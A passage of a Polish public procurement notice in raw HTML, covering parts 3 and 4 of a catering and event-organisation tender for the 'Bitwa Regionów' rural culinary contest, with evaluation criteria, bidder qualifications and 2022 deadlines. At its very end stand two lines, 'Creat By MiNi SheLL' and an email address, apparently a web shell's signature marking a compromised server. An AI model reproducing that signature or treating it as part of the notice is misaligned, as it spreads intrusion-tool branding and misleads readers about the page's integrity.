z certyfikatami unijnymi:<br/>2.1. „Chroniona Nazwa Pochodzenia”;<br/>2.2. „Chronione Oznaczenie Geograficzne”;<br/>2.3. „Gwarantowana Tradycyjna Specjalność”;<br/>2.4. „Rolnictwo ekologiczne”.<br/>W przypadku braku złożenia przez Wykonawcę w Formularzu oferty deklaracji (zobowiązania się) wykorzystania w którejkolwiek z czterech kategorii produktów wyłącznie produktów spożywczych, które posiadają co najmniej 1 (jeden) z powyższych znaków potwierdzających wysoką jakość żywności – Zamawiający przyzna 0 pkt wdanej kategorii.<br/>3.	Za ofertę najkorzystniejszą zostanie uznana ta oferta, która po zsumowaniu liczby punktów uzyskanych we wskazanych wyżej kryteriach uzyska najwyższą liczbę punktów tj.: Ł = K1 + K2.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt środowiskowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <p class="mb-0">wymagania dotyczące określonej etykiety, zgodnie z art. 104 ustawy - etykiety środowiskowej (tzw. Ekoetykieta)</p> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia stanowią usługi przygotowania i organizacji 16 wydarzeń na etapach wojewódzkich w ramach rozstrzygnięcia II etapu Konkursu Kulinarnego skierowanego do Kół Gospodyń Wiejskich pn. „Bitwa Regionów” w podziale na 4 części. <br/>2.	Ze względu na specyfikę przedmiotu zamówienia oraz konieczność jego wykonania w ściśle określonych terminach, zamówienie podzielone jest na 4 części, z których każda obejmuje organizację 4 wydarzeń (etapów wojewódzkich) – każde na terenie jednego województwa, tj.:<br/>1)	Część I (wartość szacunkowa: 289 634,30 zł netto) - Województwo: kujawsko-pomorskie, pomorskie, warmińsko-mazurskie, zachodniopomorskie; <br/>2)	Część II (wartość szacunkowa: 289 938,40 zł netto) – Województwo: dolnośląskie, lubuskie, opolskie, wielkopolskie;<br/>3)	Część III (wartość szacunkowa: 478 102,80 zł netto) – Województwo: lubelskie, łódzkie, mazowieckie, podlaskie; <br/>4)	Część IV (wartość szacunkowa: 386 243,00 zł netto) – Województwo: małopolskie, podkarpackie, śląskie, świętokrzyskie.<br/>Szczegółowy Opis Przedmiotu Zamówienia (OPZ) dla każdej części zamówienia znajduje się w załącznikach (dla Części I - załącznik nr 1a, dla Części II - załącznik nr 1b, dla części III - załącznik nr 1c, dla Części IV - załącznik nr 1d) do projektu umowy, który stanowi załącznik nr 1 do SWZ. <br/>Wydarzenia odbędą się w terminach nie pokrywających się ze sobą zgodnie z harmonogramem zawartym w szczegółowym Opisie Przedmiotu Zamówienia (OPZ) dla każdej z części zamówienia.<br/>Wydarzenia (16 wydarzeń – 1 wydarzenie w każdym województwie) zostaną zorganizowane w lokalach wskazanych w Opisie Przedmiotu Zamówienia dla każdej z części zamówienia. Zamawiający udostępni Wykonawcy lokale do organizacji wydarzeń nieodpłatnie. Przewidywana frekwencja podczas każdego z 16 wydarzeń na etapach wojewódzkich została określona w Opisie Przedmiotu Zamówienia. W ramach realizacji każdego z wydarzeń Wykonawca zapewni m.in. infrastrukturę niezbędną do organizacji wydarzenia we wskazanych lokalizacjach oraz catering dla uczestników, na który będą składać się wysokiej jakości rzemieślnicze, regionalne produkty spożywcze oraz wysokiej jakości potrawy z tych produktów podane w formie szwedzkiego stołu. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 478102,80 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79956000-0 - Usługi w zakresie organizacji targów i wystaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">22 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	CENA (K1) - 60%<br/>2) Aspekt środowiskowy (K2) – 40%<br/>Kryterium (K2) zostanie ocenione w skali punktowej do 40 punktów. <br/>Zamawiający przyzna po 10 pkt dla każdej z nw. kategorii produktów spożywczych (dotyczy wszystkich rodzajów danej kategorii produktu), które zostaną użyte do realizacji usługi cateringowej, tj.:<br/>a) ser (4 rodzaje) – 10 pkt; <br/>b) wędlina (4 rodzaje) – 10 pkt;<br/>c) ryba (1 rodzaj) – 10 pkt;<br/>d) mięso do dania głównego (2 rodzaje) – 10 pkt,<br/>na podstawie złożonej przez Wykonawcę w Formularzu oferty (Załącznik nr 2 do SWZ) deklaracji (zobowiązania się) wykorzystania w danej kategorii produktu wyłącznie produktów spożywczych, które posiadają co najmniej 1 (jeden) z poniższych znaków potwierdzających wysoką jakość żywności, tj.:<br/>GRUPA I - Produkty certyfikowane w ramach krajowych systemów jakości:<br/>1.1. „System Gwarantowanej Jakości Żywności” (QAFP);<br/>1.2. „System gwarantowania jakości mięsa wołowego” (QMP);<br/>1.3. „Jakość Tradycja”;<br/>GRUPA II - Produkty z certyfikatami unijnymi:<br/>2.1. „Chroniona Nazwa Pochodzenia”;<br/>2.2. „Chronione Oznaczenie Geograficzne”;<br/>2.3. „Gwarantowana Tradycyjna Specjalność”;<br/>2.4. „Rolnictwo ekologiczne”.<br/>W przypadku braku złożenia przez Wykonawcę w Formularzu oferty deklaracji (zobowiązania się) wykorzystania w którejkolwiek z czterech kategorii produktów wyłącznie produktów spożywczych, które posiadają co najmniej 1 (jeden) z powyższych znaków potwierdzających wysoką jakość żywności – Zamawiający przyzna 0 pkt wdanej kategorii.<br/>3.	Za ofertę najkorzystniejszą zostanie uznana ta oferta, która po zsumowaniu liczby punktów uzyskanych we wskazanych wyżej kryteriach uzyska najwyższą liczbę punktów tj.: Ł = K1 + K2.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt środowiskowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <p class="mb-0">wymagania dotyczące określonej etykiety, zgodnie z art. 104 ustawy - etykiety środowiskowej (tzw. Ekoetykieta)</p> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia stanowią usługi przygotowania i organizacji 16 wydarzeń na etapach wojewódzkich w ramach rozstrzygnięcia II etapu Konkursu Kulinarnego skierowanego do Kół Gospodyń Wiejskich pn. „Bitwa Regionów” w podziale na 4 części. <br/>2.	Ze względu na specyfikę przedmiotu zamówienia oraz konieczność jego wykonania w ściśle określonych terminach, zamówienie podzielone jest na 4 części, z których każda obejmuje organizację 4 wydarzeń (etapów wojewódzkich) – każde na terenie jednego województwa, tj.:<br/>1)	Część I (wartość szacunkowa: 289 634,30 zł netto) - Województwo: kujawsko-pomorskie, pomorskie, warmińsko-mazurskie, zachodniopomorskie; <br/>2)	Część II (wartość szacunkowa: 289 938,40 zł netto) – Województwo: dolnośląskie, lubuskie, opolskie, wielkopolskie;<br/>3)	Część III (wartość szacunkowa: 478 102,80 zł netto) – Województwo: lubelskie, łódzkie, mazowieckie, podlaskie; <br/>4)	Część IV (wartość szacunkowa: 386 243,00 zł netto) – Województwo: małopolskie, podkarpackie, śląskie, świętokrzyskie.<br/>Szczegółowy Opis Przedmiotu Zamówienia (OPZ) dla każdej części zamówienia znajduje się w załącznikach (dla Części I - załącznik nr 1a, dla Części II - załącznik nr 1b, dla części III - załącznik nr 1c, dla Części IV - załącznik nr 1d) do projektu umowy, który stanowi załącznik nr 1 do SWZ. <br/>Wydarzenia odbędą się w terminach nie pokrywających się ze sobą zgodnie z harmonogramem zawartym w szczegółowym Opisie Przedmiotu Zamówienia (OPZ) dla każdej z części zamówienia.<br/>Wydarzenia (16 wydarzeń – 1 wydarzenie w każdym województwie) zostaną zorganizowane w lokalach wskazanych w Opisie Przedmiotu Zamówienia dla każdej z części zamówienia. Zamawiający udostępni Wykonawcy lokale do organizacji wydarzeń nieodpłatnie. Przewidywana frekwencja podczas każdego z 16 wydarzeń na etapach wojewódzkich została określona w Opisie Przedmiotu Zamówienia. W ramach realizacji każdego z wydarzeń Wykonawca zapewni m.in. infrastrukturę niezbędną do organizacji wydarzenia we wskazanych lokalizacjach oraz catering dla uczestników, na który będą składać się wysokiej jakości rzemieślnicze, regionalne produkty spożywcze oraz wysokiej jakości potrawy z tych produktów podane w formie szwedzkiego stołu. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 386243,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79956000-0 - Usługi w zakresie organizacji targów i wystaw</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">22 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	CENA (K1) - 60%<br/>2) Aspekt środowiskowy (K2) – 40%<br/>Kryterium (K2) zostanie ocenione w skali punktowej do 40 punktów. <br/>Zamawiający przyzna po 10 pkt dla każdej z nw. kategorii produktów spożywczych (dotyczy wszystkich rodzajów danej kategorii produktu), które zostaną użyte do realizacji usługi cateringowej, tj.:<br/>a) ser (4 rodzaje) – 10 pkt; <br/>b) wędlina (4 rodzaje) – 10 pkt;<br/>c) ryba (1 rodzaj) – 10 pkt;<br/>d) mięso do dania głównego (2 rodzaje) – 10 pkt,<br/>na podstawie złożonej przez Wykonawcę w Formularzu oferty (Załącznik nr 2 do SWZ) deklaracji (zobowiązania się) wykorzystania w danej kategorii produktu wyłącznie produktów spożywczych, które posiadają co najmniej 1 (jeden) z poniższych znaków potwierdzających wysoką jakość żywności, tj.:<br/>GRUPA I - Produkty certyfikowane w ramach krajowych systemów jakości:<br/>1.1. „System Gwarantowanej Jakości Żywności” (QAFP);<br/>1.2. „System gwarantowania jakości mięsa wołowego” (QMP);<br/>1.3. „Jakość Tradycja”;<br/>GRUPA II - Produkty z certyfikatami unijnymi:<br/>2.1. „Chroniona Nazwa Pochodzenia”;<br/>2.2. „Chronione Oznaczenie Geograficzne”;<br/>2.3. „Gwarantowana Tradycyjna Specjalność”;<br/>2.4. „Rolnictwo ekologiczne”.<br/>W przypadku braku złożenia przez Wykonawcę w Formularzu oferty deklaracji (zobowiązania się) wykorzystania w którejkolwiek z czterech kategorii produktów wyłącznie produktów spożywczych, które posiadają co najmniej 1 (jeden) z powyższych znaków potwierdzających wysoką jakość żywności – Zamawiający przyzna 0 pkt wdanej kategorii.<br/>3.	Za ofertę najkorzystniejszą zostanie uznana ta oferta, która po zsumowaniu liczby punktów uzyskanych we wskazanych wyżej kryteriach uzyska najwyższą liczbę punktów tj.: Ł = K1 + K2.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt środowiskowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <p class="mb-0">wymagania dotyczące określonej etykiety, zgodnie z art. 104 ustawy - etykiety środowiskowej (tzw. Ekoetykieta)</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej (dotyczy każdej z czterech części zamówienia).<br/>Zamawiający uzna warunek udziału w postępowaniu za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał (usługi zakończone) lub należycie wykonuje (usługi w trakcie realizacji) co najmniej 3 (trzy) usługi, z których każda polegała na organizacji wydarzenia kulturalnego lub spotkania lub konferencji.<br/>Zamawiający wymaga, aby w ramach z każdej w ww. usług świadczona była usługa cateringowa o wartości minimum 20 000,00 zł brutto polegająca na serwowaniu posiłku składającego się z co najmniej z dwóch dań dla co najmniej 100 osób w ciągu jednego dnia.<br/>Jeżeli jedno wydarzenie kulturalne lub spotkanie lub konferencja trwało dłużej niż jeden dzień, Zamawiający nie dopuszcza na potwierdzenie spełniania warunku wykazania przez Wykonawcę więcej niż jednej usługi w ramach tego samego wydarzenia kulturalnego lub spotkania lub konferencji.<br/>UWAGA:	<br/>	W przypadku składania oferty na więcej niż jedną część zamówienia, Zamawiający dopuszcza legitymowanie się tym samym doświadczeniem w zakresie każdej z części.<br/>	W przypadku, gdy umowa obejmowała/obejmuje zakres szerszy niż wymagany przez Zamawiającego, Wykonawca winien uwzględnić tylko wartość brutto usług wskazanych w warunku udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca wraz z ofertą złoży oświadczenie o spełnianiu warunków udziału w postępowaniu oraz niepodleganiu wykluczeniu.<br/>Wzór oświadczenia stanowi załącznik nr 3 do SWZ. W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie, o którym mowa w ust. 1, składa każdy z tych Wykonawców odrębnie.<br/>2. Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została oceniona najwyżej, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, niżej wymienionych podmiotowych środków dowodowych:<br/>1) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w ust. 1, w zakresie podstaw wykluczenia z postępowania określonych w przepisach art. 108 ust. 1 ustawy. Wzór oświadczenia stanowi załącznik nr 7 do SWZ;<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została oceniona najwyżej, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, niżej wymienionych podmiotowych środków dowodowych:<br/>1) wykaz usług wykonanych lub wykonywanych w okresie 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, wartości, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie<br/>lub są wykonywane należycie. Wzór wykazu wykonanych lub wykonywanych usług stanowi załącznik nr 6 do SWZ.<br/>Dowodami określającymi czy usługi zostały wykonane należycie lub są wykonywane należycie są dowody wymienione w § 9 ust. 1 pkt 2 rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz. U. poz. 2415), tj.:<br/>a) referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane lub są wykonywane, przy czym w przypadku usług nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;<br/>b) oświadczenie Wykonawcy potwierdzające należyte wykonanie lub wykonywanie usług – jeżeli z uzasadnionych przyczyn o obiektywnym charakterze, Wykonawca nie jest w stanie uzyskać referencji bądź innych dokumentów sporządzonych przez podmiot, na rzecz którego usługi zostały wykonane lub są wykonywane, przy czym w przypadku gdy Wykonawca składa oświadczenie, zobowiązany jest podać przyczyny braku możliwości uzyskania referencji bądź innych dokumentów potwierdzających należyte wykonanie lub wykonywanie usług.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Jeżeli Wykonawca polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>2. Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego potwierdza, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>1) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących doświadczenia, zrealizuje usługę, których wskazane zdolności dotyczą.<br/>Przykładowy wzór zobowiązania podmiotu zawarty jest w załączniku nr 5 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie, o spełnianiu warunków udziału w postępowaniu oraz niepodleganiu wykluczeniu (Wzór oświadczenia stanowi załącznik nr 3 do SWZ) składa każdy z tych Wykonawców odrębnie.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz do zawarcia umowy w sprawie zamówienia publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Niedopuszczalne są zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem zmian przewidzianych przez Zamawiającego w projektach umów wg Załącznika nr 1a oraz Załącznika nr 1b do SWZ i dopuszczonych przepisami prawa. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <p class="mb-0">w zakresie żądania określonej etykiety lub wskazania mającego zastosowanie wymagania określonej etykiety, zgodnie z art. 104 ustawy: - etykiety środowiskowej (tzw. Ekoetykieta)</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-12 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-12 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-11</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com